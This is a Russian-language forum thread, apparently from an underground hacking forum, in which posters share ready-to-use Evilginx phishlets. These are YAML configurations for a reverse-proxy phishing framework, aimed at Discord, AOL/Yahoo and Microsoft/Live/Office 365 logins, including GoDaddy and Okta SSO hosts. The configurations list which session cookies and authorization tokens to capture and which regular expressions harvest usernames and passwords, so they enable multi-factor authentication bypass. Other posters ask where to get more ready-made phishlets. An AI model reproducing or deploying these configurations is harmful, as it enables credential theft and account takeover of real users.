Phishlets for Evilginx2 and Evilginx3

[rand]

Небольшой сборник паблик фишлетов, по которым можно сделать свои. Может кому и пригодится.

UPD По поводу создания фишлетов, наткнулся на замечательную статью от miserylord, по этому гайду действительно можно сделать рабочий фишлет: https://xss.pro/threads/125261/

 

[rand]

Discord.yaml

name: 'Discord 3.0 V2'
author: '@simplerhacking'
min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'discord.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'discordapp.com', session: false, is_landing: false, auto_filter: true}
sub_filters:
  - {triggers_on: 'discord.com', orig_sub: '', domain: 'discord.com', search: 'sha256-.{140}', replace: '', mimes: ['text/html']}
auth_tokens:
  - domain: 'discord.com'
    path: '/api/v9/users/@me/affinities/guilds'
    name: 'token'
    header: 'authorization'
    type: 'http'
credentials:
  username:
    key: ''
    search: '"login":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'
login:
  domain: 'discord.com'
  path: '/login'

 

[Mellstroy]

посоветуй пожалуйста источники в тг или форумы или что угодно где можно подробнее почитать про фишлеты и скачать готовые, потому что я сколько не искал очень мало инфы и уж точно не готовых фишлетов

 

[rand]

посоветуй пожалуйста источники в тг или форумы или что угодно где можно подробнее почитать про фишлеты и скачать готовые, потому что я сколько не искал очень мало инфы и уж точно не готовых фишлетов

Я не знаю. Обычно на гитхабе лежат. Да и ничего сложного в создании своего фишлета нет для версии Evilginx Community, как там в Pro не знаю. Мне хватило этого:

Ну и оф дока в нагрузку:

Introduction | Evilginx

Evilginx is a man-in-the-middle reverse-proxy attack framework used for phishing account credentials along with session cookies, which in allow bypassing of mutli-factor authentication.

help.evilginx.com

P.S. На живых таргетах не пробовал, но в тестовых условиях все работает.

 

[rand]

Коллекция фишлетов под Evilginx2 (Возможно и не актуально что-то уже давно, но для общего развития как оно делается можно что-то и извлечь полезное для себя):

 

[graber]

I did try and get red page when I use it

 

[rand]

Aol.yaml

author: '@brokenc0de'
min_ver: '3.0.0'
proxy_hosts:
  - { phish_sub: 'login', orig_sub: 'login', domain: 'aol.com', session: true, auto_filter: true, is_landing: true }
  - { phish_sub: 'api.login', orig_sub: 'api.login', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'guce', orig_sub: 'guce', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'www', orig_sub: 'www', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'oidc.www', orig_sub: 'oidc.www', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'mail', orig_sub: 'mail', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'oidc.mail', orig_sub: 'oidc.mail', domain: 'aol.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'video-api.yql', orig_sub: 'video-api.yql', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'yep.video', orig_sub: 'yep.video', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, auto_filter: false, is_landing: false }
  - { phish_sub: 's', orig_sub: 's', domain: 'aolcdn.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'o', orig_sub: 'o', domain: 'aolcdn.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'api-2-0', orig_sub: 'api-2-0', domain: 'spot.im', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'static-cdn', orig_sub: 'static-cdn', domain: 'spot.im', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'launcher', orig_sub: 'launcher', domain: 'spot.im', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'consent.cmp', orig_sub: 'consent.cmp', domain: 'oath.com', session: false, auto_filter: true, is_landing: false }
  - { phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, auto_filter: false, is_landing: false }
  - { phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: true, auto_filter: true, is_landing: false }
  - { phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.net', session: false, auto_filter: false, is_landing: false }

sub_filters:
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }

  - { triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https:\u002F\u002Flogin.yahoo.net', replace: 'https:\u002F\u002Flogin.{domain}', mimes: ['text/html'] }

  - { triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }
  - { triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript'] }

auth_tokens:
  - domain: '.aol.com'
    keys: ['OTH', 'A1S', '.*,regexp']
  - domain: '.login.aol.com'
    keys: ['T', 'Y', 'AS', '.*,regexp']
  - domain: '.www.aol.com'
    keys: ['OTHP', '.*,regexp']
  - domain: '.mail.aol.com'
    keys: ['OTHP', '.*,regexp']
  - domain: '.yahoo.com'
    keys: ['OTHP', '.*,regexp']
 
auth_urls:
  - '/d/folders/1'

credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.aol.com'
  path: '/?src=mail&client_id=dj0yJmk9VlN3cDhpNm1Id0szJmQ9WVdrOVdtRm1aMVU1Tm1zbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD1mYQ--&crumb=DRDbk5t0veX&lang=en-US&redirect_uri=https%3A%2F%2Foidc.mail.aol.com%2Fcallback&pspid=972825001&activity=mail-direct&done=https%3A%2F%2Fapi.login.aol.com%2Foauth2%2Fauthorize%3Factivity%3Dmail-direct%26client_id%3Ddj0yJmk9VlN3cDhpNm1Id0szJmQ9WVdrOVdtRm1aMVU1Tm1zbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD1mYQ--%26language%3Den-US%26nonce%3Dkvvmuf769UjtG5leQ1uJzupY9NF7NSSm%26pspid%3D972825001%26redirect_uri%3Dhttps%253A%252F%252Foidc.mail.aol.com%252Fcallback%26response_type%3Dcode%26scope%3Dmail-r%2Bycal-w%2Bopenid%2Bopenid2%2Bmail-w%2Bmail-x%2Bsdps-r%2Bmsgr-w%26src%3Dmail%26state%3DeyJhbGciOiJSUzI1NiIsImtpZCI6IjZmZjk0Y2RhZDExZTdjM2FjMDhkYzllYzNjNDQ4NDRiODdlMzY0ZjcifQ.eyJyZWRpcmVjdFVyaSI6Imh0dHBzOi8vbWFpbC5hb2wuY29tL2QvZm9sZGVycy8xIn0.aJup_XFKvI3WhNVJWXvTRYaK6LSfLHxW3ozkkU-QDXznqfJ8f4gjJu3PqgENK3qw9H7cjX-9rPX28zxKAEfZVaVPBAN2LRSHsLVisk5SPlb7IREDYgDImXMuvwz1IkAP-ShkQJcekYuTdfxrrpjnUu9TWVsWLm2vqjzmdnwGvz4'

Microsoft.yaml

author: '@brokenc0de'
min_ver: '3.0.0'
redirect_url: 'https://login.live.com'
proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "live", orig_sub: "login", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "account", orig_sub: "account", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "outlook", orig_sub: "outlook", domain: "live.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: 'gui', orig_sub: 'gui', domain: 'godaddy.com', session: true, is_landing:false,  auto_filter: false }
  - { phish_sub: 'csp', orig_sub: 'csp', domain: 'godaddy.com', session: true, is_landing:false, auto_filter: false }
  - { phish_sub: 'reporting', orig_sub: 'reporting', domain: 'cdndex.io', session: false, is_landing:false, auto_filter: false }
  - { phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false, auto_filter: false }
  - { phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'events.api', orig_sub: 'events.api', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'apm.vpce.gdw55e', orig_sub: '55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e', domain: 'elastic-cloud.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'g.sst', orig_sub: 'g.sst', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'ssl', orig_sub: 'compass-ssl', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "ok", orig_sub: "", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "okta", orig_sub: "login", domain: "okta.com", session: true, is_landing: false, auto_filter: false }

sub_filters:
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'login', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'outlook', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'storage', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'www', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'www', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'login', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'outlook', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'account', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'account', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'storage', domain: 'live.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'account', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'account', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'www', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'www', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'compass-ssl', domain: 'microsoft.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: 'account.microsoft.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "sso.godaddy.com", orig_sub: "csp", domain: "godaddy.com", search: "https://{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "sso.godaddy.com", orig_sub: "csp", domain: "godaddy.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true}
  - {triggers_on: "sso.godaddy.com", orig_sub: "sso", domain: "godaddy.com", search: "https%3A%2F%2F{hostname}", replace: "https%3A%2F%2F{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "sso.godaddy.com", orig_sub: "sso", domain: "godaddy.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "sso", domain: "godaddy.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "gui.godaddy.com", orig_sub: "gui", domain: "godaddy.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "gui.godaddy.com", orig_sub: "gui", domain: "godaddy.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "csp.godaddy.com", orig_sub: "csp", domain: "godaddy.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "reporting.cdndex.io", orig_sub: "reporting", domain: "cdndex.io", search: "https://{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "reporting.cdndex.io", orig_sub: "reporting", domain: "cdndex.io", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e.elastic-cloud.com", orig_sub: "55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e", domain: "elastic-cloud.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e.elastic-cloud.com", orig_sub: "55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e", domain: "elastic-cloud.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  ##
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.live.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "login", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'csp.godaddy.com', orig_sub: 'csp', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'csp.godaddy.com', orig_sub: 'csp', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'events.api.godaddy.com', orig_sub: 'events.api', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'events.api.godaddy.com', orig_sub: 'events.api', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'gui.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: 'href="https://{hostname}}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'gui.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'reporting.cdndex.io', orig_sub: 'reporting', domain: 'cdndex.io', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
